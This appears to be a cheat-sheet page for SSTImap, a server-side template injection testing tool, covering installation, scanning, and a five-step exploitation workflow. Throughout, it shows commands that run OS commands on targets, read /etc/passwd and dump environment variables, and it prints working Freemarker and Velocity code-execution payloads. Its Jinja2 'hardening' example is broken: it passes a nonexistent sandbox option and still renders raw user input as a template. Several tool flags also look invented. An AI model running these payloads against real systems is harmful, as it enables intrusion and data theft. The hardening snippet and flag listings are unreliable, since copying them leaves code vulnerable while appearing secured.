SSTImap
Overview
Seção intitulada “Overview”SSTImap is an automated security testing tool for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. It identifies template engines and attempts code execution to demonstrate impact of SSTI vulnerabilities.
Key Features
Seção intitulada “Key Features”- Automatic template engine detection
- SSTI vulnerability scanning
- Blind and non-blind exploitation
- Multi-payload testing
- Code execution capabilities
- Request/response analysis
- Vulnerability reporting
- Cross-platform support
Important Notice
Seção intitulada “Important Notice”WARNING: SSTImap should ONLY be used:
- In authorized penetration testing
- With explicit written permission
- On systems you own or control
- In security research environments
- For vulnerability assessment
Unauthorized testing is illegal and unethical.
Use Cases (Authorized)
Seção intitulada “Use Cases (Authorized)”- Identify SSTI vulnerabilities in web applications
- Test template engine security configurations
- Verify vulnerability remediation
- Security research and education
- Penetration testing with authorization
- Code execution impact demonstration
Installation
Seção intitulada “Installation”From GitHub
Seção intitulada “From GitHub”git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
chmod +x sstimap.pyPython Requirements
Seção intitulada “Python Requirements”# Install dependencies
pip install requests
# Or with requirements file
pip install -r requirements.txtVerify Installation
Seção intitulada “Verify Installation”python sstimap.py -hDocker Installation
Seção intitulada “Docker Installation”docker pull sstimap:latest
docker run -it sstimap:latest -hBasic Concepts
Seção intitulada “Basic Concepts”What is SSTI?
Seção intitulada “What is SSTI?”Server-Side Template Injection occurs when:
- User input is embedded in template files
- Templates are evaluated server-side
- Insufficient input sanitization exists
- Attacker can inject template directives
Common Vulnerable Templates
Seção intitulada “Common Vulnerable Templates”| Engine | Language | Usage |
|---|---|---|
| Jinja2 | Python | Flask, Django |
| Twig | PHP | Symfony |
| Freemarker | Java | Spring Boot |
| Velocity | Java | Various frameworks |
| Thymeleaf | Java | Spring |
| ERB | Ruby | Rails |
| Jade/Pug | Node.js | Express |
| EJS | Node.js | Express |
Attack Payload Examples
Seção intitulada “Attack Payload Examples”Jinja2: {{7*7}}
Twig: {{7*7}}
Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity: #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))$rt.getRuntime().exec('command')Installation and Setup
Seção intitulada “Installation and Setup”Full Installation
Seção intitulada “Full Installation”# Clone repository
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x sstimap.py
# Run help
./sstimap.py -hAlternative: Python Package
Seção intitulada “Alternative: Python Package”pip install sstimap
sstimap.py -hBasic Usage
Seção intitulada “Basic Usage”Simple Vulnerability Scan
Seção intitulada “Simple Vulnerability Scan”# Scan single URL
python sstimap.py -u "http://vulnerable-site.com/page?name=test"
# Output:
# [*] Testing server-side template injection
# [+] Jinja2 detected in: name parameter
# [+] Vulnerability confirmedScan with Custom Payload Parameter
Seção intitulada “Scan with Custom Payload Parameter”# Test specific parameter
python sstimap.py -u "http://example.com/test?input=PAYLOAD" \
--test-parameter "input"Output to File
Seção intitulada “Output to File”# Save results to file
python sstimap.py -u "http://example.com/?name=test" \
-o results.txtVerbose Output
Seção intitulada “Verbose Output”# Enable verbose mode for detailed information
python sstimap.py -u "http://example.com/?name=test" \
-vAdvanced Scanning
Seção intitulada “Advanced Scanning”Template Engine Detection
Seção intitulada “Template Engine Detection”# Detect template engine without exploitation
python sstimap.py -u "http://vulnerable-app.com/?search=test" \
--detect-only
# Output shows:
# [+] Template engine: Jinja2
# [+] Injection point: search parameterTest All Parameters
Seção intitulada “Test All Parameters”# Automatically test all GET/POST parameters
python sstimap.py -u "http://example.com/?id=1&name=test&type=prod" \
--test-all-paramsBlind SSTI Detection
Seção intitulada “Blind SSTI Detection”# Test for blind SSTI (time-based)
python sstimap.py -u "http://example.com/?input=test" \
--detect-blind
# Introduces delays to detect processingCustom Timeout
Seção intitulada “Custom Timeout”# Set custom timeout for responses
python sstimap.py -u "http://example.com/?id=test" \
--timeout 10Exploitation Techniques
Seção intitulada “Exploitation Techniques”Basic Code Execution
Seção intitulada “Basic Code Execution”# Test basic math to confirm SSTI
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD" \
--test-expression "7*7"
# Result should show: 49Command Execution
Seção intitulada “Command Execution”# Execute OS command
python sstimap.py -u "http://example.com/?input=PAYLOAD" \
--execute-command "id"
# Attempts: whoami, id, cat /etc/passwd, etc.File Reading
Seção intitulada “File Reading”# Read server files
python sstimap.py -u "http://example.com/?file=PAYLOAD" \
--read-file "/etc/passwd"
# Or guess common file paths
python sstimap.py -u "http://example.com/?page=PAYLOAD" \
--read-filesDatabase Interaction
Seção intitulada “Database Interaction”# Attempt database access via template injection
python sstimap.py -u "http://vulnerable-app.com/?search=PAYLOAD" \
--databaseRequest Configuration
Seção intitulada “Request Configuration”Custom Headers
Seção intitulada “Custom Headers”# Add authentication headers
python sstimap.py -u "http://example.com/?id=test" \
-H "Authorization: Bearer TOKEN" \
-H "User-Agent: Custom-Agent"POST Data
Seção intitulada “POST Data”# Test POST parameters
python sstimap.py -u "http://example.com/login" \
--data "username=admin&password=test" \
--test-parameter "password"Cookies
Seção intitulada “Cookies”# Include session cookies
python sstimap.py -u "http://example.com/?name=test" \
--cookie "PHPSESSID=abcd1234; admin=false"Proxy Configuration
Seção intitulada “Proxy Configuration”# Route through proxy
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080"
# For Burp Suite
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080" \
--ignore-proxy-warningsSSL Verification
Seção intitulada “SSL Verification”# Ignore SSL warnings (test environments)
python sstimap.py -u "https://example.com/?input=test" \
--no-ssl-verifyTemplate Engine Specific Payloads
Seção intitulada “Template Engine Specific Payloads”Jinja2 (Python)
Seção intitulada “Jinja2 (Python)”# Test Jinja2
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payloads tested:
# {{7*7}} -> 49
# {{config.items()}}
# {{request.environ}}Twig (PHP)
Seção intitulada “Twig (PHP)”# Twig injection test
python sstimap.py -u "http://vulnerable.com/?search=PAYLOAD"
# Payloads:
# {{7*7}} -> 49
# {{_self}}
# {{this.env}}Freemarker (Java)
Seção intitulada “Freemarker (Java)”# Freemarker payload
python sstimap.py -u "http://vulnerable.com/?input=PAYLOAD"
# Freemarker RCE payload
# <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}Velocity (Java)
Seção intitulada “Velocity (Java)”# Velocity injection
python sstimap.py -u "http://vulnerable.com/?id=PAYLOAD"
# Math expression: #set($x=7*7)$xThymeleaf (Java)
Seção intitulada “Thymeleaf (Java)”# Thymeleaf template injection
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payload: [[${7*7}]]Automation and Batch Testing
Seção intitulada “Automation and Batch Testing”Scan Multiple URLs
Seção intitulada “Scan Multiple URLs”# Test multiple endpoints
cat urls.txt | while read url; do
python sstimap.py -u "$url" -o results_$(date +%s).txt
doneBulk Parameter Testing
Seção intitulada “Bulk Parameter Testing”#!/bin/bash
# Test all parameters in URL list
while read url; do
echo "Testing: $url"
python sstimap.py -u "$url" \
--test-all-params \
-o results.txt
done < urls.txtAutomated Reporting
Seção intitulada “Automated Reporting”#!/bin/bash
# Generate report of findings
TARGET="http://vulnerable-app.com"
REPORT="ssti_report_$(date +%Y%m%d).txt"
echo "SSTI Vulnerability Assessment Report" > $REPORT
echo "Date: $(date)" >> $REPORT
echo "Target: $TARGET" >> $REPORT
echo "================================" >> $REPORT
# Test all discovered endpoints
python sstimap.py -u "$TARGET" \
--test-all-params \
-v >> $REPORT
echo "Report saved to: $REPORT"Output Analysis
Seção intitulada “Output Analysis”Understanding Output
Seção intitulada “Understanding Output”[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)Parse Results Script
Seção intitulada “Parse Results Script”#!/bin/bash
# Extract vulnerable endpoints
python sstimap.py -u "http://target.com/?id=test" \
--test-all-params -v 2>&1 | \
grep -E "\[+\]|VULNERABLE" | \
tee vulnerabilities.logExploitation Workflow
Seção intitulada “Exploitation Workflow”Step 1: Reconnaissance
Seção intitulada “Step 1: Reconnaissance”# Map application parameters
python sstimap.py -u "http://target.com/?search=test&category=1" \
--detect-onlyStep 2: Template Detection
Seção intitulada “Step 2: Template Detection”# Identify template engine
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--detect-template-engineStep 3: Vulnerability Confirmation
Seção intitulada “Step 3: Vulnerability Confirmation”# Confirm SSTI vulnerability
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--test-expression "7*7"Step 4: Code Execution
Seção intitulada “Step 4: Code Execution”# Execute commands
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--execute-command "id"Step 5: Post-Exploitation
Seção intitulada “Step 5: Post-Exploitation”# Read sensitive files
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-file "/etc/passwd"
# Access environment variables
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-envIntegration with Other Tools
Seção intitulada “Integration with Other Tools”Burp Suite Integration
Seção intitulada “Burp Suite Integration”# Use SSTImap through Burp proxy
python sstimap.py -u "http://example.com/?param=test" \
--proxy "http://127.0.0.1:8080"
# Intercept and modify requests in Burp
# Then test with SSTImapOWASP ZAP Integration
Seção intitulada “OWASP ZAP Integration”# Export ZAP findings and test with SSTImap
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8090"Metasploit Integration
Seção intitulada “Metasploit Integration”# Use findings from SSTImap in Metasploit
# 1. Run SSTImap to identify SSTI
# 2. Use template-specific exploits in Metasploit
# 3. Gain shell access via template injectionPrevention and Mitigation
Seção intitulada “Prevention and Mitigation”Secure Coding Practices
Seção intitulada “Secure Coding Practices”1. Input Validation
- Whitelist allowed characters
- Reject suspicious patterns
- Length restrictions
2. Template Sandboxing
- Use restricted templates
- Disable dangerous functions
- Limit object access
3. Context Separation
- Don't mix code with templates
- Use template escaping
- Separate logic from presentation
4. Security Configuration
- Disable debug mode in production
- Restrict file access
- Limit available functionsJinja2 Hardening Example
Seção intitulada “Jinja2 Hardening Example”from jinja2 import Environment, select_autoescape
# Create restricted environment
env = Environment(
autoescape=select_autoescape(['html', 'xml']),
sandbox=True # Enable sandbox
)
# Disable dangerous filters
env.filters['unsafe'] = lambda x: x # Don't use!
# Render safely
template = env.from_string(user_input)
result = template.render(safe_var=value)Detection Patterns
Seção intitulada “Detection Patterns”Suspicious patterns to monitor:
- {{7*7}} responses as 49
- {%.*%} in requests
- Object access attempts
- File read attempts
- OS command patternsTroubleshooting
Seção intitulada “Troubleshooting”Tool Not Finding Vulnerabilities
Seção intitulada “Tool Not Finding Vulnerabilities”Issue: SSTI exists but SSTImap doesn’t detect it.
Solution:
# Try manual testing
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
-v
# Test with custom payload
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
--payload "{{7*7}}"
# Different parameter
python sstimap.py -u "http://example.com/?name=PAYLOAD" \
--test-parameter "name"Connection Issues
Seção intitulada “Connection Issues”Issue: Unable to connect to target.
Solution:
# Test connectivity
curl http://target.com/?id=test
# Try with verbose
python sstimap.py -u "http://target.com/?id=test" \
-v
# Use proxy if needed
python sstimap.py -u "http://target.com/?id=test" \
--proxy "http://127.0.0.1:8080"False Positives
Seção intitulada “False Positives”Issue: Tool reports vulnerabilities that don’t exist.
Solution:
# Verify manually
# 1. Submit test payload: {{7*7}}
# 2. Check if response shows: 49
# 3. Confirm with different payloads
# Test with blind detection
python sstimap.py -u "http://target.com/?id=test" \
--detect-blindSecurity Considerations
Seção intitulada “Security Considerations”Authorized Testing Only
Seção intitulada “Authorized Testing Only”Before testing:
✓ Obtain written authorization
✓ Define scope clearly
✓ Document test plan
✓ Get legal review
✓ Maintain confidentialityData Protection
Seção intitulada “Data Protection”# Encrypt sensitive findings
gpg -e -r recipient@company.com report.txt
# Secure deletion
shred -vfz report.txt
# Audit trail
echo "$(date): SSTI testing completed" >> audit.logReferences
Seção intitulada “References”- GitHub: vladimirmitin/sstimap
- OWASP: Server-Side Template Injection
- PortSwigger: SSTI Tutorial
- CVE Database: Search SSTI vulnerabilities
Quick Reference
Seção intitulada “Quick Reference”# Basic scan
python sstimap.py -u "http://vulnerable.com/?id=test"
# Detect template engine
python sstimap.py -u "http://vulnerable.com/?id=test" --detect-only
# Execute command
python sstimap.py -u "http://vulnerable.com/?id=test" --execute-command "id"
# Read file
python sstimap.py -u "http://vulnerable.com/?id=test" --read-file "/etc/passwd"
# Test all parameters
python sstimap.py -u "http://vulnerable.com/?a=1&b=2&c=3" --test-all-params
# Verbose output
python sstimap.py -u "http://vulnerable.com/?id=test" -v
# Save results
python sstimap.py -u "http://vulnerable.com/?id=test" -o results.txt
# With proxy
python sstimap.py -u "http://vulnerable.com/?id=test" --proxy "http://127.0.0.1:8080"
# Custom headers
python sstimap.py -u "http://vulnerable.com/?id=test" \
-H "Authorization: Bearer TOKEN"